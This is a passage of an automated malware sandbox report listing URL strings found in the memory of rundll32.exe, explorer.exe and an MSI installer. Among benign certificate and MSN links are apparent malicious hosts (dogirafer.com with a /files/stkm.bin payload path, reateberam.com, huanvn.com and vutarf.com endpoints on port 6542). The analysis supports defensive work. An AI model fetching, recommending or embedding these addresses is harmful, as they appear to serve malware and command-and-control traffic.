            Source: explorer.exe, 00000009.00000000.1922418491.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4143464537.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
            Source: rundll32.exe, 00000005.00000002.4140824135.000001E51772B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4141047160.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823437020.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1919232883.000001E5177BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r10.i.lencr.org/0
            Source: rundll32.exe, 00000005.00000002.4140824135.000001E51772B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4141047160.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823437020.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1919232883.000001E5177BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r10.o.lencr.org0#
            Source: rundll32.exe, 00000005.00000003.1919140281.000001E5177E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4140824135.000001E51772B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4141123576.000001E5177EC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823307275.000001E5177EC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823468675.000001E5177EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.i.lencr.org/0
            Source: rundll32.exe, 00000005.00000003.1919140281.000001E5177E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4140824135.000001E51772B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4141123576.000001E5177EC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823307275.000001E5177EC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823468675.000001E5177EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.o.lencr.org0#
            Source: explorer.exe, 00000009.00000000.1929051492.00000000098A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.mi
            Source: explorer.exe, 00000009.00000000.1929051492.00000000098A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.micr
            Source: explorer.exe, 00000009.00000000.1924820436.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.1932111599.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.1923210820.0000000007F40000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
            Source: fes.msi, MSI15E9.tmp.1.dr, MSI1688.tmp.1.dr, MSI16F7.tmp.1.dr, MSI17D3.tmp.1.dr, 45150f.msi.1.dr, MSI16A8.tmp.1.dr, MSI1658.tmp.1.drString found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
            Source: fes.msi, MSI15E9.tmp.1.dr, MSI1688.tmp.1.dr, MSI16F7.tmp.1.dr, MSI17D3.tmp.1.dr, 45150f.msi.1.dr, MSI16A8.tmp.1.dr, MSI1658.tmp.1.drString found in binary or memory: http://t2.symcb.com0
            Source: fes.msi, MSI15E9.tmp.1.dr, MSI1688.tmp.1.dr, MSI16F7.tmp.1.dr, MSI17D3.tmp.1.dr, 45150f.msi.1.dr, MSI16A8.tmp.1.dr, MSI1658.tmp.1.drString found in binary or memory: http://tl.symcb.com/tl.crl0
            Source: fes.msi, MSI15E9.tmp.1.dr, MSI1688.tmp.1.dr, MSI16F7.tmp.1.dr, MSI17D3.tmp.1.dr, 45150f.msi.1.dr, MSI16A8.tmp.1.dr, MSI1658.tmp.1.drString found in binary or memory: http://tl.symcb.com/tl.crt0
            Source: fes.msi, MSI15E9.tmp.1.dr, MSI1688.tmp.1.dr, MSI16F7.tmp.1.dr, MSI17D3.tmp.1.dr, 45150f.msi.1.dr, MSI16A8.tmp.1.dr, MSI1658.tmp.1.drString found in binary or memory: http://tl.symcd.com0&
            Source: fes.msi, MSI15E9.tmp.1.dr, MSI1688.tmp.1.dr, MSI16F7.tmp.1.dr, MSI17D3.tmp.1.dr, 45150f.msi.1.dr, MSI16A8.tmp.1.dr, MSI1658.tmp.1.drString found in binary or memory: http://www.digicert.com/CPS0
            Source: rundll32.exe, 00000005.00000003.1919140281.000001E5177E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4140824135.000001E51772B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4141123576.000001E5177EC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823307275.000001E5177EC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4141047160.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823468675.000001E5177EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823437020.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1919232883.000001E5177BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: rundll32.exe, 00000005.00000003.1919140281.000001E5177E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4140824135.000001E51772B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4141123576.000001E5177EC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823307275.000001E5177EC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4141047160.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823468675.000001E5177EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823437020.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1919232883.000001E5177BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: explorer.exe, 00000009.00000000.1934799200.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
            Source: explorer.exe, 00000009.00000002.4143464537.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
            Source: explorer.exe, 00000009.00000002.4143464537.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
            Source: explorer.exe, 00000009.00000000.1934799200.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
            Source: explorer.exe, 00000009.00000002.4147116004.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1925954013.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
            Source: explorer.exe, 00000009.00000002.4147116004.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1925954013.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
            Source: explorer.exe, 00000009.00000002.4141948811.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1921523688.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4140702532.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1920734447.0000000001248000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
            Source: explorer.exe, 00000009.00000002.4147116004.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1925954013.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
            Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
            Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4147116004.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1925954013.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
            Source: explorer.exe, 00000009.00000002.4147116004.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1925954013.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
            Source: explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
            Source: explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
            Source: explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
            Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
            Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
            Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
            Source: explorer.exe, 00000009.00000000.1922418491.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4143464537.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
            Source: explorer.exe, 00000009.00000000.1922418491.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4143464537.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
            Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
            Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
            Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
            Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
            Source: explorer.exe, 00000009.00000003.3106528073.000000000CB33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dogirafer.com/
            Source: explorer.exe, 00000009.00000003.3064403345.000000000CB33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dogirafer.com/3
            Source: explorer.exe, 00000009.00000003.3468545748.000000000CB32000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dogirafer.com/3p
            Source: explorer.exe, 00000009.00000003.3105393162.000000000CB33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3106653549.000000000CB3D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3106528073.000000000CB33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dogirafer.com/6122658-3693405117-2476756634-1002
            Source: explorer.exe, 00000009.00000002.4156669266.000000000CAE3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dogirafer.com/6122658-3693405117-2476756634-1002q
            Source: explorer.exe, 00000009.00000002.4154916178.000000000C964000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dogirafer.com/CD
            Source: explorer.exe, 00000009.00000002.4154916178.000000000C964000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dogirafer.com/F
            Source: explorer.exe, 00000009.00000003.3105893826.00000000098E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3105393162.000000000CA7C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dogirafer.com/files/stkm.bin
            Source: explorer.exe, 00000009.00000002.4156528625.000000000CA42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3064403345.000000000CAE3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3181105020.00000000087C0000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3105393162.000000000CA7C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dogirafer.com/test/
            Source: explorer.exe, 00000009.00000002.4154916178.000000000C54A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dogirafer.com/test/%
            Source: explorer.exe, 00000009.00000002.4148681254.0000000009BFE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://dogirafer.com/test/0
            Source: explorer.exe, 00000009.00000002.4156669266.000000000CAE3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dogirafer.com/test/36P
            Source: explorer.exe, 00000009.00000002.4156669266.000000000CAE3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dogirafer.com/test/56J
            Source: explorer.exe, 00000009.00000003.3468352135.000000000C9D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dogirafer.com/test/H
            Source: explorer.exe, 00000009.00000002.4154916178.000000000C964000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dogirafer.com/test/KB
            Source: explorer.exe, 00000009.00000002.4154916178.000000000C964000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dogirafer.com/test/_D
            Source: explorer.exe, 00000009.00000003.3064403345.000000000CAE3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dogirafer.com/test/l6m
            Source: explorer.exe, 00000009.00000002.4148263882.0000000009A10000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dogirafer.com/test/ser-l1-1-0
            Source: explorer.exe, 00000009.00000002.4154916178.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1934799200.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
            Source: rundll32.exe, 00000005.00000002.4140824135.000001E517790000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1919232883.000001E51778E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://huanvn.com/
            Source: rundll32.exe, 00000005.00000002.4140824135.000001E517790000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1919232883.000001E51778E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://huanvn.com/3
            Source: rundll32.exe, 00000005.00000002.4140824135.000001E517784000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://huanvn.com:6542/gop.php
            Source: rundll32.exe, 00000005.00000002.4140824135.000001E517784000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://huanvn.com:6542/gop.phpf
            Source: rundll32.exe, 00000005.00000002.4140824135.000001E517784000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://huanvn.com:6542/gop.phpw
            Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
            Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
            Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
            Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
            Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
            Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
            Source: explorer.exe, 00000009.00000000.1922418491.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4143464537.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
            Source: explorer.exe, 00000009.00000002.4154916178.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1934799200.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
            Source: explorer.exe, 00000009.00000002.4154916178.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1934799200.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
            Source: explorer.exe, 00000009.00000002.4154916178.000000000C964000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://reateberam.com/
            Source: explorer.exe, 00000009.00000003.3092452883.0000000009070000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2903762845.0000000008750000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3152054536.0000000009080000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3181105020.00000000087C0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://reateberam.com/test/
            Source: explorer.exe, 00000009.00000003.2903762845.0000000008750000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://reateberam.com/test/3155509_577958930160_4374071URLS1https://dogirafer.com/test/2006230_2943
            Source: explorer.exe, 00000009.00000003.3152054536.0000000009080000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://reateberam.com/test/5285504_70103146102045_6870568URLS1https://dogirafer.com/test/7527773_96
            Source: explorer.exe, 00000009.00000003.3181105020.00000000087C0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://reateberam.com/test/5351441_21349625930948_9623822URLS1https://dogirafer.com/test/8025589_88
            Source: explorer.exe, 00000009.00000003.3092452883.0000000009070000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://reateberam.com/test/9001616_28662416912457_9237360URLS1https://dogirafer.com/test/5693052_67
            Source: explorer.exe, 00000009.00000002.4156669266.000000000CAE3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3105655586.000000000CAE3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3064403345.000000000CAE3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://reateberam.com/test/G
            Source: explorer.exe, 00000009.00000002.4156669266.000000000CAE3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3105655586.000000000CAE3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3064403345.000000000CAE3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://reateberam.com/test/W
            Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
            Source: rundll32.exe, 00000005.00000002.4144009305.00007FFDF91DD000.00000002.00000001.01000000.00000005.sdmp, avutil.dll.1.drString found in binary or memory: https://streams.videolan.org/upload/
            Source: rundll32.exe, 00000005.00000002.4141047160.000001E5177D7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823437020.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1919232883.000001E5177BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vutarf.com/
            Source: rundll32.exe, 00000005.00000002.4141047160.000001E5177D7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823437020.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1919232883.000001E5177BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vutarf.com/Z
            Source: rundll32.exe, 00000005.00000002.4141047160.000001E5177D7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823437020.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1919232883.000001E5177BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vutarf.com/s
            Source: rundll32.exe, 00000005.00000002.4140824135.000001E51772B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4141047160.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823437020.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1919232883.000001E5177BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vutarf.com:6542/stop.php
            Source: rundll32.exe, 00000005.00000002.4140824135.000001E51772B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vutarf.com:6542/stop.php:N
            Source: rundll32.exe, 00000005.00000002.4141047160.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823437020.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1919232883.000001E5177BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vutarf.com:6542/stop.phpE
            Source: rundll32.exe, 00000005.00000002.4140824135.000001E51772B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vutarf.com:6542/stop.phpXw
            Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
            Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
            Source: explorer.exe, 00000009.00000002.4154916178.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1934799200.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
            Source: explorer.exe, 00000009.00000002.4154916178.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1934799200.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
            Source: fes.msi, MSI15E9.tmp.1.dr, MSI1688.tmp.1.dr, MSI16F7.tmp.1.dr, MSI17D3.tmp.1.dr, 45150f.msi.1.dr, MSI16A8.tmp.1.dr, MSI1658.tmp.1.drString found in binary or memory: https://www.advancedinstaller.com
            Source: fes.msi, MSI15E9.tmp.1.dr, MSI1688.tmp.1.dr, MSI16F7.tmp.1.dr, MSI17D3.tmp.1.dr, 45150f.msi.1.dr, MSI16A8.tmp.1.dr, MSI1658.tmp.1.drString found in binary or memory: https://www.digicert.com/CPS0
            Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
            Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
            Source: explorer.exe, 00000009.00000000.1922418491.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4143464537.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
            Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
            Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
            Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
            Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
            Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
            Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
